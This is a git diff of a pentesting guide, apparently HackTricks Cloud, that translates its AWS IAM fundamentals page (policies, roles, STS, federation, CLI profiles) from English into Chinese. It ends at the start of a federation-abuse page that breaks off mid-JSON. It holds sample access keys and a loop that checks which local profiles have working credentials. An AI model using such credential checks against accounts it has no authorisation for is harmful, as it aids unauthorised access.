-- Deny creating IAM users and access keys - -Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) +在 [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) 中查找 **JSON 示例**。 ### ARN -**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this: - +**亚马逊资源名称** 是每个 AWS 内部资源的 **唯一名称**,其组成如下: ``` arn:partition:service:region:account-id:resource-type/resource-id arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env ``` - -Note that there are 4 partitions in AWS but only 3 ways to call them: +注意,AWS中有4个分区,但只有3种调用方式: - AWS Standard: `aws` - AWS China: `aws-cn` - AWS US public Internet (GovCloud): `aws-us-gov` - AWS Secret (US Classified): `aws` -## IAM - Identity and Access Management +## IAM - 身份和访问管理 -IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. +IAM是允许您管理**身份验证**、**授权**和**访问控制**的服务。 -- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. -- **Access Control** - The method and process of how access is granted to a secure resource +- **身份验证** - 定义身份和验证该身份的过程。此过程可以细分为:识别和验证。 +- **授权** - 确定身份在系统中经过身份验证后可以访问的内容。 +- **访问控制** - 授予安全资源访问权限的方法和过程。 -IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. +IAM可以通过其管理、控制和治理身份对您AWS账户内资源的身份验证、授权和访问控制机制的能力来定义。 -### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) +### [AWS账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) -When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**. +当您首次创建Amazon Web Services (AWS)账户时,您将拥有一个具有**完全访问所有**AWS服务和资源的单一登录身份。这是AWS账户的_**根用户**_,通过使用**您用于创建账户的电子邮件地址和密码**进行登录。 -Note that a new **admin user** will have **less permissions that the root user**. +请注意,新创建的**管理员用户**将具有**比根用户更少的权限**。 -From a security point of view, it's recommended to create other users and avoid using this one. +从安全的角度来看,建议创建其他用户并避免使用此用户。 -### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) +### [IAM用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) -An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys). +IAM_用户_是您在AWS中创建的实体,用于**代表使用它与AWS交互的人员或应用程序**。AWS中的用户由名称和凭据(密码和最多两个访问密钥)组成。 -When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user. 
+当您创建IAM用户时,您通过将其设置为具有适当权限策略的**用户组成员**(推荐)或**直接将策略附加**到用户来授予其**权限**。 -Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)). +用户可以启用**MFA登录**控制台。启用MFA的用户的API令牌不受MFA保护。如果您想要**使用MFA限制用户的API密钥访问**,您需要在策略中指明为了执行某些操作需要MFA(示例[**在这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。 #### CLI -- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). +- **访问密钥ID**:20个随机的大写字母数字字符,如AKHDNAPO86BSHKDIRYT +- **秘密访问密钥ID**:40个随机的大小写字符:S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU(无法检索丢失的秘密访问密钥ID)。 -Whenever you need to **change the Access Key** this is the process you should follow:\ +每当您需要**更改访问密钥**时,您应遵循以下过程:\ &#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ -### MFA - Multi Factor Authentication +### MFA - 多因素身份验证 -It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ -You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. +它用于**创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\ +您可以使用**免费的虚拟应用程序或物理设备**。您可以使用像Google身份验证器这样的应用程序免费激活AWS中的MFA。 -Policies with MFA conditions can be attached to the following: +带有MFA条件的策略可以附加到以下内容: -- An IAM user or group -- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic -- The trust policy of an IAM role that can be assumed by a user - -If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ -Note that **`AssumeRole` credentials don't contain this information**. +- IAM用户或组 +- 资源,例如Amazon S3桶、Amazon SQS队列或Amazon SNS主题 +- 可以被用户假设的IAM角色的信任策略 +如果您想要**通过CLI访问**一个**检查MFA**的资源,您需要调用**`GetSessionToken`**。这将为您提供一个包含MFA信息的令牌。\ +请注意,**`AssumeRole`凭据不包含此信息**。 ```bash aws sts get-session-token --serial-number --token-code ``` +如[**此处所述**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html),有很多不同的情况**无法使用MFA**。 -As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**. +### [IAM用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) -### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) +IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以使管理这些用户的权限变得更容易。**角色和组不能成为组的一部分**。 -An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**. 
+您可以将**基于身份的策略附加到用户组**,以便用户组中的所有**用户**都**接收该策略的权限**。您**不能**在**策略**(例如基于资源的策略)中将**用户组**标识为**`Principal`**,因为组与权限相关,而不是身份验证,主体是经过身份验证的IAM实体。 -You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities. +以下是用户组的一些重要特征: -Here are some important characteristics of user groups: +- 一个用户**组**可以**包含多个用户**,而一个**用户**可以**属于多个组**。 +- **用户组不能嵌套**;它们只能包含用户,而不能包含其他用户组。 +- **没有默认的用户组会自动包含AWS账户中的所有用户**。如果您想要这样的用户组,您必须创建它并将每个新用户分配给它。 +- AWS账户中IAM资源的数量和大小是有限制的,例如组的数量,以及用户可以成为成员的组的数量。有关更多信息,请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。 -- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. -- **User groups can't be nested**; they can contain only users, not other user groups. -- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. -- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). +### [IAM角色](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) -### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) +IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份,决定了它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色不是唯一与一个人关联,而是旨在**被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以**临时**承担特定任务的不同权限。角色可以被[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)分配,该用户通过使用外部身份提供者而不是IAM进行登录。 -An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM. +IAM角色由**两种类型的策略**组成:**信任策略**,不能为空,定义**谁可以假设**该角色,以及**权限策略**,不能为空,定义**它可以访问什么**。 -An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**. +#### AWS安全令牌服务(STS) -#### AWS Security Token Service (STS) +AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权限凭证的发放**。它专门针对: -AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. 
It is specifically tailored for: +### [IAM中的临时凭证](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) -### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) +**临时凭证主要与IAM角色一起使用**,但也有其他用途。您可以请求具有比标准IAM用户更有限权限集的临时凭证。这**防止**您**意外执行不允许的任务**。临时凭证的一个好处是它们在设定的时间段后会自动过期。您可以控制凭证的有效期。 -**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid. +### 策略 -### Policies +#### 策略权限 -#### Policy Permissions +用于分配权限。有两种类型: -Are used to assign permissions. There are 2 types: - -- AWS managed policies (preconfigured by AWS) -- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. - -By **default access** is **denied**, access will be granted if an explicit role has been specified.\ -If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). +- AWS管理策略(由AWS预配置) +- 客户管理策略:由您配置。您可以基于AWS管理策略创建策略(修改其中一个并创建自己的),使用策略生成器(一个帮助您授予和拒绝权限的GUI视图)或编写自己的策略。 +默认情况下,访问**被拒绝**,如果指定了明确的角色,则将授予访问权限。\ +如果**存在单个“拒绝”**,它将覆盖“允许”,但AWS账户的根安全凭证的请求(默认允许)除外。 ```javascript { - "Version": "2012-10-17", //Version of the policy - "Statement": [ //Main element, there can be more than 1 entry in this array - { - "Sid": "Stmt32894y234276923" //Unique identifier (optional) - "Effect": "Allow", //Allow or deny - "Action": [ //Actions that will be allowed or denied - "ec2:AttachVolume", - "ec2:DetachVolume" - ], - "Resource": [ //Resource the action and effect will be applied to - "arn:aws:ec2:*:*:volume/*", - "arn:aws:ec2:*:*:instance/*" - ], - "Condition": { //Optional element that allow to control when the permission will be effective - "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} - } - } - ] +"Version": "2012-10-17", //Version of the policy +"Statement": [ //Main element, there can be more than 1 entry in this array +{ +"Sid": "Stmt32894y234276923" //Unique identifier (optional) +"Effect": "Allow", //Allow or deny +"Action": [ //Actions that will be allowed or denied +"ec2:AttachVolume", +"ec2:DetachVolume" +], +"Resource": [ //Resource the action and effect will be applied to +"arn:aws:ec2:*:*:volume/*", +"arn:aws:ec2:*:*:instance/*" +], +"Condition": { //Optional element that allow to control when the permission will be effective +"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} +} +} +] } ``` +The [全球字段可以在任何服务中用于条件的文档在这里](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ +The [每个服务中可以用于条件的特定字段的文档在这里](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). 
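As a rough illustration of how those condition keys end up in a policy, the sketch below creates a customer managed policy gated on the global `aws:SourceIp` key — the policy name, bucket and CIDR are made-up values:

```bash
# Create a customer managed policy that only allows s3:GetObject
# when the request originates from a given CIDR (aws:SourceIp is a global condition key)
aws iam create-policy --policy-name ExampleSourceIpRestricted --policy-document '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::example-bucket/*",
      "Condition": {
        "IpAddress": {"aws:SourceIp": "203.0.113.0/24"}
      }
    }
  ]
}'
```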
-The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ -The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). +#### 内联策略 -#### Inline Policies +这种策略是**直接分配**给用户、组或角色的。因此,它们不会出现在策略列表中,因为其他任何人都可以使用它们。\ +内联策略在您想要**保持策略与应用于的身份之间的严格一对一关系**时非常有用。例如,您想确保策略中的权限不会意外分配给除其预期身份以外的身份。当您使用内联策略时,策略中的权限不能意外附加到错误的身份。此外,当您使用AWS管理控制台删除该身份时,嵌入在身份中的策略也会被删除。这是因为它们是主体实体的一部分。 -This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\ -Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. +#### 资源桶策略 -#### Resource Bucket Policies +这些是可以在**资源**中定义的**策略**。**并非所有AWS资源都支持它们**。 -These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**. +如果主体没有对它们的明确拒绝,并且资源策略授予他们访问权限,则他们被允许。 -If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed. +### IAM边界 -### IAM Boundaries +IAM边界可以用于**限制用户或角色应有的权限**。这样,即使通过**不同的策略**授予用户不同的权限,如果他尝试使用它们,操作将**失败**。 -IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them. +边界只是附加到用户的策略,**指示用户或角色可以拥有的最大权限级别**。因此,**即使用户具有管理员访问权限**,如果边界指示他只能读取S·桶,那就是他能做的最大事情。 -A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do. +**这**、**SCPs**和**遵循最小权限**原则是控制用户没有超过其所需权限的方法。 -**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs. +### 会话策略 -### Session Policies - -A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has). - -This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised. 
+会话策略是**在某种情况下假定角色时设置的策略**。这将像是该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限是角色拥有的权限)。 +这对于**安全措施**非常有用:当管理员要假定一个非常特权的角色时,他可以将权限限制为仅在会话策略中指示的权限,以防会话被破坏。 ```bash aws sts assume-role \ - --role-arn \ - --role-session-name \ - [--policy-arns ] - [--policy ] +--role-arn \ +--role-session-name \ +[--policy-arns ] +[--policy ] ``` +注意,默认情况下,**AWS 可能会向即将生成的会话添加会话策略**,这是由于第三方原因。例如,在[未经身份验证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles)中,默认情况下(使用增强身份验证),AWS 将生成**带有会话策略的会话凭证**,该策略限制会话可以访问的服务[**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。 -Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services). +因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为**有一个会话策略阻止了它**。 -Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**. +### 身份联合 -### Identity Federation +身份联合**允许来自外部身份提供者的用户**安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\ +身份提供者的一个例子可以是你自己的企业**Microsoft Active Directory**(通过**SAML**)或**OpenID**服务(如**Google**)。联合访问将允许其中的用户访问 AWS。 -Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\ -An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS. +要配置此信任,生成一个**IAM 身份提供者(SAML 或 OAuth)**,该提供者将**信任****其他平台**。然后,至少一个**IAM 角色被分配(信任)给身份提供者**。如果来自受信任平台的用户访问 AWS,他将以提到的角色进行访问。 -To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role. - -However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. +然而,通常你会希望根据第三方平台中用户的**组别给予不同的角色**。然后,多个**IAM 角色可以信任**第三方身份提供者,第三方平台将允许用户假定一个角色或另一个角色。
-### IAM Identity Center +### IAM 身份中心 -AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications. +AWS IAM 身份中心(AWS 单点登录的继任者)扩展了 AWS 身份和访问管理(IAM)的功能,提供一个**集中位置**,将**用户及其对 AWS**帐户和云应用程序的访问管理汇集在一起。 -The login domain is going to be something like `.awsapps.com`. +登录域将类似于`.awsapps.com`。 -To login users, there are 3 identity sources that can be used: +要登录用户,可以使用 3 个身份源: -- Identity Center Directory: Regular AWS users -- Active Directory: Supports different connectors -- External Identity Provider: All users and groups come from an external Identity Provider (IdP) +- 身份中心目录:常规 AWS 用户 +- Active Directory:支持不同的连接器 +- 外部身份提供者:所有用户和组来自外部身份提供者(IdP)
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. +在身份中心目录的最简单情况下,**身份中心将拥有用户和组的列表**,并能够**为他们分配策略**到**组织的任何帐户**。 -In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account. +为了给予身份中心用户/组对帐户的访问,将创建一个**信任身份中心的 SAML 身份提供者**,并在目标帐户中创建一个**信任身份提供者并具有指示策略的角色**。 #### AwsSSOInlinePolicy -It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**. +可以通过内联策略**向通过 IAM 身份中心创建的角色授予权限**。在被授予**AWS 身份中心内联策略**的帐户中创建的角色将具有名为**`AwsSSOInlinePolicy`**的内联策略中的这些权限。 -Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**. +因此,即使你看到两个具有名为**`AwsSSOInlinePolicy`**的内联策略的角色,也**并不意味着它们具有相同的权限**。 -### Cross Account Trusts and Roles +### 跨账户信任和角色 -**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ -It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. +**用户**(信任)可以创建一个带有某些策略的跨账户角色,然后**允许另一个用户**(受信任)**访问他的帐户**,但仅**具有新角色策略中指示的访问权限**。要创建此角色,只需创建一个新角色并选择跨账户角色。跨账户访问的角色提供两个选项。提供你拥有的 AWS 账户之间的访问,以及提供你拥有的账户与第三方 AWS 账户之间的访问。\ +建议**指定被信任的用户,而不是放置一些通用内容**,因为如果不这样做,其他经过身份验证的用户(如联合用户)也将能够滥用此信任。 -### AWS Simple AD +### AWS 简单 AD -Not supported: +不支持: -- Trust Relations -- AD Admin Center -- Full PS API support -- AD Recycle Bin -- Group Managed Service Accounts -- Schema Extensions -- No Direct access to OS or Instances +- 信任关系 +- AD 管理中心 +- 完整的 PS API 支持 +- AD 回收站 +- 组托管服务账户 +- 架构扩展 +- 无法直接访问操作系统或实例 -#### Web Federation or OpenID Authentication +#### Web 联合或 OpenID 身份验证 -The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS. +该应用程序使用 AssumeRoleWithWebIdentity 创建临时凭证。然而,这并不授予对 AWS 控制台的访问,仅授予对 AWS 内部资源的访问。 -### Other IAM options +### 其他 IAM 选项 -- You can **set a password policy setting** options like minimum length and password requirements. -- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. +- 你可以**设置密码策略设置**选项,如最小长度和密码要求。 +- 你可以**下载“凭证报告”**,其中包含有关当前凭证的信息(如用户创建时间、密码是否启用...)。你可以每**四小时**生成一次凭证报告。 -AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. 
With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. +AWS 身份和访问管理(IAM)提供**细粒度的访问控制**,覆盖所有 AWS。使用 IAM,你可以指定**谁可以访问哪些服务和资源**,以及在什么条件下。通过 IAM 策略,你管理对你的员工和系统的权限,以**确保最小权限**。 -### IAM ID Prefixes +### IAM ID 前缀 -In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature: +在[**此页面**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids)中,你可以找到根据其性质的键的**IAM ID 前缀**: -| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | +| ABIA | [AWS STS 服务承载令牌](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | | ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| ACCA | Context-specific credential | -| AGPA | User group | -| AIDA | IAM user | -| AIPA | Amazon EC2 instance profile | -| AKIA | Access key | -| ANPA | Managed policy | -| ANVA | Version in a managed policy | -| APKA | Public key | -| AROA | Role | -| ASCA | Certificate | -| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. | +| ACCA | 上下文特定凭证 | +| AGPA | 用户组 | +| AIDA | IAM 用户 | +| AIPA | Amazon EC2 实例配置文件 | +| AKIA | 访问密钥 | +| ANPA | 管理策略 | +| ANVA | 管理策略中的版本 | +| APKA | 公钥 | +| AROA | 角色 | +| ASCA | 证书 | +| ASIA | [临时(AWS STS)访问密钥 ID](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) 使用此前缀,但仅在与秘密访问密钥和会话令牌组合时是唯一的。 | -### Recommended permissions to audit accounts +### 审计账户的推荐权限 -The following privileges grant various read access of metadata: +以下权限授予各种元数据的读取访问: - `arn:aws:iam::aws:policy/SecurityAudit` - `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` @@ -336,14 +320,13 @@ The following privileges grant various read access of metadata: - `directconnect:DescribeConnections` - `dynamodb:ListTables` -## Misc +## 杂项 -### CLI Authentication - -In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. 
By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\ -In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\ -Example of credentials file with more than 1 profile: +### CLI 身份验证 +为了让常规用户通过 CLI 认证到 AWS,你需要拥有**本地凭证**。默认情况下,你可以在`~/.aws/credentials`中**手动**配置它们,或通过**运行**`aws configure`。\ +在该文件中,你可以拥有多个配置文件,如果在使用**aws cli**时**未指定配置文件**,则将使用该文件中名为**`[default]`**的配置文件。\ +具有多个配置文件的凭证文件示例: ``` [default] aws_access_key_id = AKIA5ZDCUJHF83HDTYUT @@ -354,12 +337,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7 region = eu-west-2 ``` +如果您需要访问**不同的AWS账户**,并且您的配置文件被授予访问**在这些账户内假设角色**的权限,您不需要每次手动调用STS(`aws sts assume-role --role-arn --role-session-name sessname`)并配置凭证。 -If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials. - -You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\ -A config file example: - +您可以使用`~/.aws/config`文件来[**指示要假设的角色**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html),然后像往常一样使用`--profile`参数(`assume-role`将以透明的方式为用户执行)。\ +配置文件示例: ``` [profile acc2] region=eu-west-2 @@ -368,23 +349,16 @@ role_session_name = source_profile = sts_regional_endpoints = regional ``` - -With this config file you can then use aws cli like: - +使用此配置文件,您可以像这样使用 aws cli: ``` aws --profile acc2 ... ``` +如果您正在寻找类似的东西,但针对**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。 -If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en). 
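When you land on a machine with an existing AWS CLI setup, a small loop like this (assuming AWS CLI v2, which provides `configure list-profiles`) quickly shows which locally configured profiles still hold working credentials:

```bash
# Check every locally configured profile for valid credentials
for p in $(aws configure list-profiles); do
  echo "== $p =="
  aws sts get-caller-identity --profile "$p" 2>/dev/null || echo "invalid or expired credentials"
done
```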
- -## References +## 参考文献 - [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) - [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) - [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md index 73ae6b448..ee9ea8ce7 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -1,87 +1,84 @@ -# AWS - Federation Abuse +# AWS - 联邦滥用 {{#include ../../../banners/hacktricks-training.md}} ## SAML -For info about SAML please check: +有关 SAML 的信息,请查看: {{#ref}} https://book.hacktricks.xyz/pentesting-web/saml-attacks {{#endref}} -In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) +为了通过 SAML 配置 **身份联邦**,您只需提供一个 **名称** 和包含所有 SAML 配置的 **元数据 XML**(**端点**,**带有公钥的证书**) -## OIDC - Github Actions Abuse +## OIDC - Github Actions 滥用 -In order to add a github action as Identity provider: - -1. For _Provider type_, select **OpenID Connect**. -2. For _Provider URL_, enter `https://token.actions.githubusercontent.com` -3. Click on _Get thumbprint_ to get the thumbprint of the provider -4. For _Audience_, enter `sts.amazonaws.com` -5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: - - ```json - { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": 